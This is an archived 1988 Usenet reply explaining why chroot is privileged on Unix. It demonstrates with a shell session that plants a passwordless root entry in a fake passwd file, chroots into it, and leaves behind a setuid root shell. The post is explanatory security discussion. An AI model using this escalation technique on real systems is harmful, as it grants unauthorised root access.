Xref: utzoo news.admin:4110 news.sysadmin:1728 comp.mail.uucp:2392 Path: utzoo!attcan!uunet!pyrdc!jetson!john From: john@jetson.UPMA.MD.US (John Owens) Newsgroups: news.admin,news.sysadmin,comp.mail.uucp Subject: Re: Dangerous hole in Usenet! Message-ID: <172@jetson.UPMA.MD.US> Date: 29 Nov 88 21:19:33 GMT References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <155@ecicrl.UUCP> Organization: SMART HOUSE Limited Partnership Lines: 34 In article <155@ecicrl.UUCP>, clewis@ecicrl.UUCP (Chris Lewis) writes: > Secondly, can someone out there explain why chroot is privileged? Or > why /etc/chroot isn't setuid? Hmm. % ln /bin/su /tmp/su % mkdir /tmp/etc % echo root::0:0::/:/sh > /tmp/etc/passwd % ln /bin/sh /tmp/sh % ln /bin/chown /tmp/chown % ln /bin/chmod /tmp/chmod % cd /tmp % /etc/chroot /tmp /sh $ ./su root # chown root sh # chmod u+s sh # exit $ exit % /tmp/sh $ id ruid=555 euid=0 gid=101 $ ..... [Or some variation of the above; please don't pick on details unless they're fatal to the concept.] In other words, chroot allows you to fool privileged programs that rely on files with particular pathnames (/etc/passwd, /etc/group, /etc/hosts.equiv, /usr/lib/sendmail.cf, /usr/lib/aliases, etc.). -- John Owens john@jetson.UPMA.MD.US uunet!jetson!john +1 301 249 6000 john%jetson.uucp@uunet.uu.net